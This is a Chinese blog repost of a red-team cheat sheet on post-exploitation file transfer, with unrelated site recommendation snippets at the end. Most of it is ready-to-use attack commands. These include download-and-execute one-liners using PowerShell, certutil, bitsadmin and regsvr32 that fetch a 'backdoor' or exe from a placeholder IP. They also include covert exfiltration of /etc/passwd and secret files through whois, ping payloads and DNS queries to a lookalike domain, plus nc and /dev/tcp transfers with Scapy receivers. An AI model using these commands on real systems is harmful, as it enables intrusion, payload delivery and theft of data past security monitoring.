后渗透测试中的文件传输技巧

最新推荐文章于 2021-11-12 18:25:27 发布
最新推荐文章于 2021-11-12 18:25:27 发布
阅读量476 收藏
点赞数
文章标签: python ruby awk
原文链接:http://www.cnblogs.com/heycomputer/articles/10697539.html
版权

Referrence:https://xax007.github.io/2019-01-13-post-exploitation-file-transfer-tips/

目录

在红队渗透测试当中往往需要最大化利用当前的环境绕过重兵防守的系统的防火墙、IDS、IPS等报警和监控系统进行文件传输,本文列出了多种利用操作系统默认自带的工具进行文件传输的方法。

搭建 HTTP server

Python

python2:

python -m SimpleHTTPServer 1337

以上命令会在当前目录启动 HTTP 服务,端口为 1337

python3:

python -m http.server 1337

以上命令会在当前目录启动 HTTP 服务,端口为 1337

PHP 5.4+

当 PHP 版本大于 5.4 是,可使用 PHP 在当前目录启动 HTTP 服务,端口为 1337

php -S 0.0.0.0:1337

Ruby

下面的命令会在当前目录下启动 HTTP 服务,端口为 1337

ruby -rwebrick -e'WEBrick::HTTPServer.new(:Port => 1337, :DocumentRoot => Dir.pwd).start'

Ruby 1.9.2+

ruby -run -e httpd . -p 1337

Perl

perl -MHTTP::Server::Brick -e '$s=HTTP::Server::Brick->new(port=>1337); $s->mount("/"=>{path=>"."}); $s->start'

perl -MIO::All -e 'io(":8080")->fork->accept->(sub { $_[0] < io(-x $1 +? "./$1 |" : $1) if /^GET \/(.*) / })'

Thanks to: http://stackoverflow.com/questions/8058793/single-line-python-webserver

busybox httpd

busybox httpd -f -p 8000

本条来自:lvm

从 HTTP server 下载文件

以下列出了在 Windows 和 Linux 系统下使用系统自带工具从 HTTP Server 下载文件的几种方法

Windows

powershell

下载并执行:

powershell (new-object System.Net.WebClient).DownloadFile('http://1.2.3.4/5.exe','c:\download\a.exe');start-process 'c:\download\a.exe'
certutil

下载并执行:

certutil -urlcache -split -f http://1.2.3.4/5.exe c:\download\a.exe&&c:\download\a.exe
bitsadmin

下载并执行:

bitsadmin /transfer n http://1.2.3.4/5.exe c:\download\a.exe && c:\download\a.exe

⚠️ bitsadmin 的下载速度比较慢

regsvr32
regsvr32 /u /s /i:http://1.2.3.4/5.exe scrobj.dll

Linux

Curl
curl http://1.2.3.4/backdoor
Wget
wget http://1.2.3.4/backdoor
awk

在使用 awk 进行下载文件时,首先使用以上列出的任意一条命令启动一个 HTTP Server

awk 'BEGIN {
  RS = ORS = "\r\n"
  HTTPCon = "/inet/tcp/0/127.0.0.1/1337"
  print "GET /secret.txt HTTP/1.1\r\nConnection: close\r\n"    |& HTTPCon
  while (HTTPCon |& getline > 0)
      print $0
  close(HTTPCon)
}'

效果:

Setup HTTP PUT server

以下列出了上传文件到 HTTP Server 的几种方法

使用 Nginx 搭建 HTTP PUT Server

mkdir -p /var/www/upload/ # 创建目录 
chown www-data:www-data /var/www/upload/ # 修改目录所属用户和组
cd /etc/nginx/sites-available # 进入 nginx 虚拟主机目录 # 写入配置到 file_upload 文件 cat <<EOF > file_upload server { listen 8001 default_server; server_name kali; location / { root /var/www/upload; dav_methods PUT; } } EOF # 写入完毕 cd ../sites-enable # 进入 nginx 虚拟主机启动目录 ln -s /etc/nginx/sites-available/file_upload file_upload # 启用 file_upload 虚拟主机 systemctl start nginx # 启动 Nginx

使用 Python 搭建 HTTP PUT Server

以下代码保存到 HTTPutServer.py 文件里:

# ref: https://www.snip2code.com/Snippet/905666/Python-HTTP-PUT-test-server
import sys
import signal from threading import Thread from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler class PUTHandler(BaseHTTPRequestHandler): def do_PUT(self): length = int(self.headers['Content-Length']) content = self.rfile.read(length) self.send_response(200) with open(self.path[1:], "w") as f: f.write(content) def run_on(port): print("Starting a HTTP PUT Server on {0} port {1} (http://{0}:{1}) ...".format(sys.argv[1], port)) server_address = (sys.argv[1], port) httpd = HTTPServer(server_address, PUTHandler) httpd.serve_forever() if __name__ == "__main__": if len(sys.argv) < 3: print("Usage:\n\tpython {0} ip 1337".format(sys.argv[0])) sys.exit(1) ports = [int(arg) for arg in sys.argv[2:]] try: for port_number in ports: server = Thread(target=run_on, args=[port_number]) server.daemon = True # Do not make us wait for you to exit server.start() signal.pause() # Wait for interrupt signal, e.g. KeyboardInterrupt except KeyboardInterrupt: print "\nPython HTTP PUT Server Stoped." sys.exit(1)

运行方法:

$ python HTTPutServer.py 10.10.10.100 1337
Starting a HTTP PUT Server on 10.10.10.100 port 1337 (http://10.10.10.100:1337) ...

上传文件到 HTTP PUT server

Linux

Curl
$ curl --upload-file secret.txt http://ip:port/
Wget
$ wget --method=PUT --post-file=secret.txt http://ip:port/

Windows

Powershell
$body = Get-Content secret.txt
Invoke-RestMethod -Uri http://ip:port/secret.txt -Method PUT -Body $body

使用 Bash /dev/tcp 进行文件传输

首先需要监听端口

接收端:

nc -lvnp 1337 > secret.txt

发送端:

cat secret.txt > /dev/tcp/ip/port

使用 SMB 协议进行文件传输

搭建简易 SMB Server

搭建简易SMB Server 需要用到 Impacket 项目的 smbserver.py 文件

Impacket 已默认安装在 Kali Linux 系统中

syntax: impacker-smbserver ShareName SharePath

$ mkdir smb # 创建 smb 目录
$ cd smb # 进入 smb目录
$ impacket-smbserver share `pwd` # 在当前目录启动 SMB server,共享名称为 share

效果:

从 SMB server 下载文件
copy \\IP\ShareName\file.exe file.exe
上传文件到 SMB server
net use x: \\IP\ShareName

copy file.txt x:

net use x: /delete

使用 whois 命令进行文件传输

 
/etc/passwd
Host A
Host B

接收端 Host B:

nc -vlnp 1337 | sed "s/ //g" | base64 -d

发送端 Host A:

whois -h 127.0.0.1 -p 1337 `cat /etc/passwd | base64`

效果:

使用 ping 命令进行文件传输

 
secret.txt
Sender
Reciver

发送端:

xxd -p -c 4 secret.txt | while read line; do ping -c 1 -p $line ip; done

接收端:

以下代码保存到 ping_receiver.py

import sys

try:
    from scapy.all import * except: print("Scapy not found, please install scapy: pip install scapy") sys.exit(0) def process_packet(pkt): if pkt.haslayer(ICMP): if pkt[ICMP].type == 8: data = pkt[ICMP].load[-4:] print(f'{data.decode("utf-8")}', flush=True, end="", sep="") sniff(iface="eth0", prn=process_packet)

执行方法:

python3 ping_receiver.py

效果

使用 dig 命令进行文件传输

 
/etc/passwd
Sender
Reciver

发送端:

xxd -p -c 31 /etc/passwd | while read line; do dig @172.16.1.100 +short +tries=1 +time=1 $line.gooogle.com; done

接收端:

以下代码使用了 python 的 scapy 模块,需要手动安装

代码保存到 dns_reciver.py 文件中

try:
    from scapy.all import * except: print("Scapy not found, please install scapy: pip install scapy") def process_packet(pkt): if pkt.haslayer(DNS): domain = pkt[DNS][DNSQR].qname.decode('utf-8') root_domain = domain.split('.')[1] if root_domain.startswith('gooogle'): print(f'{bytearray.fromhex(domain[:-13]).decode("utf-8")}', flush=True, end='') sniff(iface="eth0", prn=process_packet)

运行方法:

python3 dns_reciver.py

效果:

Transfer files via dig

使用 NetCat 进行文件传输

 
1.txt
A:10.10.10.100
B:10.10.10.200

接受端:

nc -l -p 1337 > 1.txt

发送端:

cat 1.txt | nc -l -p 1337

或者

nc 10.10.10.200 1337 < 1.txt

在极端环境下,如果接受端没有 nc 可以使用 Bash 的 /dev/tcp 接收文件:

cat < /dev/tcp/10.10.10.200/1337 > 1.txt

参考链接

转载于:https://www.cnblogs.com/heycomputer/articles/10697539.html

weixin_30496431
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
HTML 转 PDF 之 wkhtmltopdf 工具精讲
for_lazy的博客
04-30 1331
工具 “wkhtmltopdf” 简介 【官网】:【http://wkhtmltopdf.org/ 】 【下载请点击这里】 【http://wkhtmltopdf.org/downloads.html 】 工具全名叫 “wkhtmltopdf” ; 是一个使用 Qt WebKit 引擎做渲染的,能够把html 文档转换成 pdf 文档 或 图片(image) 的命令行工具。(强调一下:是 “命令行...
web渗透测试技巧(上)
10-12
### Web渗透测试技巧详解(上) #### 知识点概览 本文将深入解析一系列重要的Web渗透测试技巧,包括但不限于HTTP协议的基础理解、常见的HTTP请求方法及其应用、以及利用特定HTTP方法进行的安全测试实践。 #### ...
HttpPost实现上传文件(File类)
qq_38018496的博客
11-12 2328
MultipartFile 转 File public static File multipartFileToFile(MultipartFile file) throws Exception { File toFile = null; if (file.equals("") || file.getSize() <= 0) { file = null; } else { InputStream ins = null; ins = file.ge.
渗透测试文件传输技巧
whatday的专栏
07-02 1106
目录 搭建 HTTP server Python PHP 5.4+ Ruby Ruby 1.9.2+ Perl busybox httpd Download files from HTTP server Windows Linux Setup HTTP PUT server 使用 Nginx 搭建 HTTP PUT Server 使用 Python 搭建 HTTP PUT Server 上传文件到 HTTP PUT server Linux Windows 使用 Bash
渗透测试之内网渗透的数据传输
Blood_Pupil的博客
07-01 1603
DNS隧道
网络上常用的一些网站
weixin_30653023的博客
06-12 265
域名查询 Whois 查询 站长工具 http://whois.chinaz.com/ 是用来查询域名的IP以及所有者等信息的传输协议。简单说,whois就是一个用来查询域名是否已经被注册,以及注册域名的详细信息的数据库(如域名所有人、域名注册商)。通过whois来实现对域名信息的查询。早期的whois查询多以命令列接口存在,但是现在出现了一些网页接口简化的线上查询工具,可以一次向不同的数...
CobaltStrike4.0渗透测试手册
03-18
《Cobalt Strike 4.0渗透测试手册》是一本深度探讨网络安全渗透测试技术的专业指南,特别是聚焦于Cobalt Strike 4.0这一强大的安全工具。Cobalt Strike是一款广泛使用的红队操作框架,它允许安全专业人员模拟攻击...
入侵渗透用到的一些技巧和思路
05-19
以上技巧和思路都是黑客在进行渗透测试时可能会采用的方法,但值得注意的是,这些行为必须在合法授权和合规的前提下进行,否则将构成非法入侵,带来严重的法律后果。在实际操作,应当遵循道德和法律规范,确保网络...
Web渗透测试工程师—初级教程.zip
11-25
理解Web的工作原理对于进行渗透测试至关重要,因为我们需要识别和利用Web应用程序的脆弱性。 第二章:Web组件有哪些? Web组件通常包括Web服务器、数据库、应用程序服务器和客户端浏览器。Web服务器负责接收和...
Metasploit--后渗透--上传/下载文件
千寻的博客
02-18 8202
upload file 命令则能够向目标系统上传文件。 download file 命令可以帮助我们从目标系统下载文件
安全测试-数据回传
rechanel的博客
12-13 970
发布到海外的应用要保证所有的应用数据不能回传到国国内,这涉及到海外用户的隐私,这种问题常常很严重,测试的时候要格外注意,不仅仅测试用户隐私加密问题,还要此时数据回传问题。 测试方法: 1.  用filddler抓应用所有的数据请求的host和URL。 2.  去网站iplocation.net查看该host所属于的国家和地区,如果在国内,需要迁移到国外。
渗透测试常用文件传输方法-Windows篇(如何向Windows服务器上传文件?) (゚益゚メ) 渗透测试
寻觅的博客
04-05 1732
文章目录文件传输certutil 文件传输 文件传输渗透测试主要用于将攻击载荷上传到目标主机或者获取目标资产使用。 certutil certutil是Windows内置的一个证书服务的一部分,其有可以被我们利用的下载模块。 # 显示或删除 URL 缓存项目 -URLCache # 分离嵌入的抽象语法标记1(ASN.1)元素,并保存到文件 -URLCache -split -URLCache -f ...
渗透——内网转发之利用ftp实现文件传输
爱国小白帽
03-21 3556
FTP(File Transfer Protocol,文件传输协议) 是 TCP/IP 协议组的协议之一。FTP协议包括两个组成部分,其一为FTP服务器,其二为FTP客户端。其FTP服务器用来存储文件,用户可以使用FTP客户端通过FTP协议访问位于FTP服务器上的资源。在开发网站的时候,通常利用FTP协议把网页或程序传到Web服务器上。此外,由于FTP传输效率非常高,在网络上传输大的文件时,...
渗透测试常用WINDOWS命令
缘木之鱼
07-14 1464
ifconfig /all 获取获取域名、IP地址、DHCP服务器、网关、MAC地址、主机名 net time /domain 查看域名、时间 net view /domain 查看域内所有共享 net view ip 查看对方局域网内开启了哪些共享 net config workstation 查看域名、机器名等 net user 用户名 密码 /add 建立用户 net user guest...
内网渗透----文件传输
浅笑996的博客
03-08 1413
0x01.Windows目标 1.FTP echo open 192.168.0.23 2121 &amp;amp;gt;&amp;amp;gt; 1.txt //登陆FTP服务器 echo 123&amp;amp;gt;&amp;amp;gt;1.txt //用户名 echo 123&amp;amp;gt;&amp;amp;gt;1.txt
whois
Beauty of Programming
07-06 863
whois命令简介 一、概述 whois是Linux/Unix环境下的命令,按字面意思就是问“他是谁?”,通过对域名的检索, 可以反馈回域名的注册信息,包括持有人,管理资料以及技术联络资料, 也包括该域名的域名服务器。但是在世界上有几个主要的whois服务器,它们是 whois.RIPE.net、whois.LACNIC.net、whois.APNIC.net、whois.ARIN.net,分
通过cmd上传文件的方法-wget方法
椰树ii
09-27 6365
测试机:win2003(win系统都可以,不一一举例)工具:wget.exe用法cmd下wget.exe http://www.xxx.com/xxx -O c:/windows/xxx(本地保存路径)如图:OK,上传成功。其实这个方法比较多余, 因为在拿到shell之后想办法传程序上去,wget.exe是第三方程序作用也是传程序,你有办法传wget.exe上去,就可以传别的,根本用不着wget....
绕过加密爆破:Web登录账号密码的渗透测试策略
本文主要探讨了在网络安全渗透测试,如何应对登录系统账号密码经过JavaScript加密后再传输的情况,提出了四种不同的破解或爆破思路。 一、加密账号密码的传输方式概述 在现代Web应用,为了提高安全性,许多...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值